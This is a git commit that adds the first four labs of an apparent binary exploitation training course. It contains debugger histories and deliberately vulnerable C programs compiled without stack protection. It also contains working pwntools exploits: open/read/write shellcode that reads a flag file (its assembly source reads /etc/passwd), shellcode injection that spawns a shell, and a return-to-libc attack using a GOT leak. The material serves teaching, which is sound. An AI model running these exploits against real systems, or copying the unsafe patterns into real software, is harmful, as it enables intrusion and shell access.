dnrops
/
HITCON-Training
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

add lab1-lab4

This commit is contained in:
angelboy 2016-11-28 20:03:13 +08:00
parent 2f4ff1a22b
commit f548ba54d0
19 changed files with 890 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

256
LAB/lab1/.gdb_history Normal file
View File

@ -0,0 +1,256 @@
disas main
b *0x08048799
r
info registers
pdisas main
info registers
xinfo
xinfo register
context
x/wx 0xffffd640
si
ni
q
q
disas main
disas get_flag
b *0x080486ee
r
ni
x/wx
x/wx 0xffffd5b8
c
q
disas get_flag
b *0x080486ee
r
ni
x/w 0xffffd5b8
c
q
bcall read
r
ni
x/wx 0xffffd5b8
c
clear
q
disas get_flag
b *0x08048720
r
set $edx=$eax
info registers
c
q
disas main
info functions
q
disas main
disas get_flag
b *0x080486ee
r
ni
x/d 0xffffd5b8
c
q
ãr
b *0x080486ee
r
ni
x/d 0xffffd5b8
x/u 0xffffd5b8
r
c
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
bu'
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ãc
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
r
ni
x/d 0xffffd5b8
ni
ni
c
r
ni
x/d 0xffffd5b8
q
r
x/d 0xffffd5b8
x/x 0xffffd5b8
x/p 0xffffd5b8
x/u 0xffffd5b8
x/o 0xffffd5b8
r
disas main
disas get_flag
b *0x080486ee
r
x/x 0xffffd5b8
c
x/x 0xffffd5b8
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
r
ni
x/d 0xffffd5b8
c
q
r
x/x $esp
info $esp
info esp
info registers esp
q
disas main
disas get_flag
b *0x080486ee
r
ni
p/u 0xffffd5b8
p/u *0xffffd5b8
c
r
ni
p/u *0xffffd5b8
x/d 0xffffd5b8
c
q
bcall read
r
ni
p/u *0xffffd5b8
x/d 0xffffd5b8
ni
got
q

BIN
LAB/lab1/sysmagic Executable file
View File

Binary file not shown.

28
LAB/lab1/sysmagic.c Normal file
View File

@ -0,0 +1,28 @@
#include <stdio.h>
#include <unistd.h>
void get_flag(){
int fd ;
int password;
int magic ;
char key[] = "Do_you_know_why_my_teammate_Orange_is_so_angry???";
char cipher[] = {7, 59, 25, 2, 11, 16, 61, 30, 9, 8, 18, 45, 40, 89, 10, 0, 30, 22, 0, 4, 85, 22, 8, 31, 7, 1, 9, 0, 126, 28, 62, 10, 30, 11, 107, 4, 66, 60, 44, 91, 49, 85, 2, 30, 33, 16, 76, 30, 66};
fd = open("/dev/urandom",0);
read(fd,&password,4);
printf("Give me maigc :");
scanf("%d",&magic);
if(password == magic){
for(int i = 0 ; i < sizeof(cipher) ; i++){
printf("%c",cipher[i]^key[i]);
}
}
}
int main(){
setvbuf(stdout,0,2,0);
get_flag();
return 0 ;
}

75
LAB/lab2/.gdb_history Normal file
View File

@ -0,0 +1,75 @@
dias main
disas main
q
disas main
b *0x0804858a
r
si
q
disas main
b *0x0804858a
at
c
si
ni
si
ni
q
disas main
diaas _start
info functions
b *0x08048060
r
si
ni
ni
q
disas mian
disas main
b *0x08048559
r
si
ni
b *0x80484fd
r
c
q
b *0x80484fd
c
r
ni
x/30wx 0xffffd5b0
x/30wx 0xffffd5c4
q
disas main
q
disas main
b *0x80484fd
r
si
si
si
q
q
q
at
disas main
b *0x0804858a
c
si
si
x/s 0x80490c8
x/30gx 0x804a065
x/30wx 0x804a065
x/30wx 0x804a060
x/30wx 0x804a060
q
q
q
q
q
q
b _start
r
ni
q

2
LAB/lab2/Makefile Normal file
View File

@ -0,0 +1,2 @@
orw:orw.c
gcc -z execstack -m32 orw.c -o orw

30
LAB/lab2/orw.asm Normal file
View File

@ -0,0 +1,30 @@
section .text
global _start
_start
jmp file
open :
pop ebx
xor eax,eax
mov al,5
xor ecx,ecx
int 0x80
mov ebx,eax
mov al,3
mov ecx,esp
mov dl,0x30
int 0x80
mov al,4
mov bl,1
mov dl,0x30
int 0x80
xor eax,eax
inc eax
int 0x80
file :
call open
db '/etc/passwd',0x0

BIN
LAB/lab2/orw.bin Executable file
View File

Binary file not shown.

12
LAB/lab2/orw.py Normal file
View File

@ -0,0 +1,12 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = "11002"
r = remote(host,port)
r.recvuntil(":")
sc = "\xeb\x20\x5b\x31\xc0\xb0\x05\x31\xc9\xcd\x80\x89\xc3\xb0\x03\x89\xe1\xb2\x30\xcd\x80\xb0\x04\xb3\x01\xb2\x30\xcd\x80\x31\xc0\x40\xcd\x80\xe8\xdb\xff\xff\xff/home/orw/flag\x00"
r.sendline(sc)
r.interactive()

256
LAB/lab3/.gdb_history Normal file
View File

@ -0,0 +1,256 @@
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q
b *main
r
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
q
r
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextdown
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
q
q
r
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
q
contextdown
q
b main
r
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q

2
LAB/lab3/Makefile Normal file
View File

@ -0,0 +1,2 @@
ret2sc:ret2sc.c
gcc -m32 -fno-stack-protector -z execstack ret2sc.c -o ret2sc

BIN
LAB/lab3/ret2sc Executable file
View File

Binary file not shown.

13
LAB/lab3/ret2sc.c Normal file
View File

@ -0,0 +1,13 @@
#include <stdio.h>
char name[50];
int main(){
setvbuf(stdout,0,2,0);
printf("Name:");
read(0,name,50);
char buf[20];
printf("Try your best:");
gets(buf);
return ;
}

17
LAB/lab3/ret2sc.py Normal file
View File

@ -0,0 +1,17 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "10.211.55.28"
port = 8888
r = remote(host,port)
name = 0x804a060
r.recvuntil(":")
r.sendline(asm(shellcraft.sh()))
r.recvuntil(":")
payload = "a"*32
payload += p32(name)
r.sendline(payload)
r.interactive()

135
LAB/lab4/.gdb_history Normal file
View File

@ -0,0 +1,135 @@
disas main
q
r
off puts
off system
q
disas main
b *0x0000000000400814
r
q
r
vmmmap
vmmap
x/30gx 0x0804a000
x/30wx 0x0804a000
q
r
off puts
q
r
got
at
got
x/wx 0x804a01cc
x/wx 0x804a01c
x/i 0xf7591ca0
off puts
at
vmmap
libc
off system
r
q
r
abcd 32
c
length 32 P
find sh
find /binsh
find /bin/sh
off 0xf7f6f82b
libc
x/x 0xf7f6f82b-0xf7e14000
q
r
vmmap
r
x/x 0x804a060
x/x 0x804a080
q
patten
patten_create
cyclic
pattern_create
pattern_create 100
r
q
r
r
ni
b read
r
ni
q
r
ni
b read
r
ni
q
r
b read
c
ni
r
ni
q
r
b read
r
ni
q
r
b read
r
ni
q
r
q
r
q
q
r
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextup
contextup
contextup
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
contextdown
q

2
LAB/lab4/Makefile Normal file
View File

@ -0,0 +1,2 @@
ret2lib:ret2lib.c
gcc -fno-stack-protector -mpreferred-stack-boundary=2 -m32 ret2lib.c -o ret2lib

BIN
LAB/lab4/ret2lib Executable file
View File

Binary file not shown.

34
LAB/lab4/ret2lib.c Normal file
View File

@ -0,0 +1,34 @@
#include <stdio.h>
void See_something(unsigned int addr){
int *address ;
address = (int *)addr ;
printf("The content of the address : %p\n",*address);
};
void Print_message(char *mesg){
char buf[48];
strcpy(buf,mesg);
printf("Your message is : %s",buf);
}
int main(){
char address[10] ;
char message[256];
unsigned int addr ;
puts("###############################");
puts("Do you know return to library ?");
puts("###############################");
puts("What do you want to see in memory?");
printf("Give me an address (in dec) :");
fflush(stdout);
read(0,address,10);
addr = strtol(address);
See_something(addr) ;
printf("Leave some message for me :");
fflush(stdout);
read(0,message,256);
Print_message(message);
puts("Thanks you ~");
return 0 ;
}

27
LAB/lab4/ret2lib.py Normal file
View File

@ -0,0 +1,27 @@
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
host = "training.pwnable.tw"
port = 11004
r = remote(host,port)
r.recvuntil(":")
puts_got = 0x0804a01c
r.sendline(str(puts_got))
r.recvuntil(": ")
puts_adr = int(r.recvuntil("\n").strip(),16)
puts_off = 0x5f140
libc = puts_adr - puts_off
print "libc : ",hex(libc)
system = libc + 0x3a940
sh = 0x804929e
r.recvuntil(":")
payload = "a"*60
payload += p32(system)
payload += "bbbb"
payload += p32(sh)
r.sendline(payload)
r.interactive()

1
env_setup.sh
View File

@ -1,5 +1,6 @@
#!/bin/bash
#
cd $HOME
sudo apt-get -y update
sudo apt-get -y upgrade
sudo apt-get -y install binutils nasm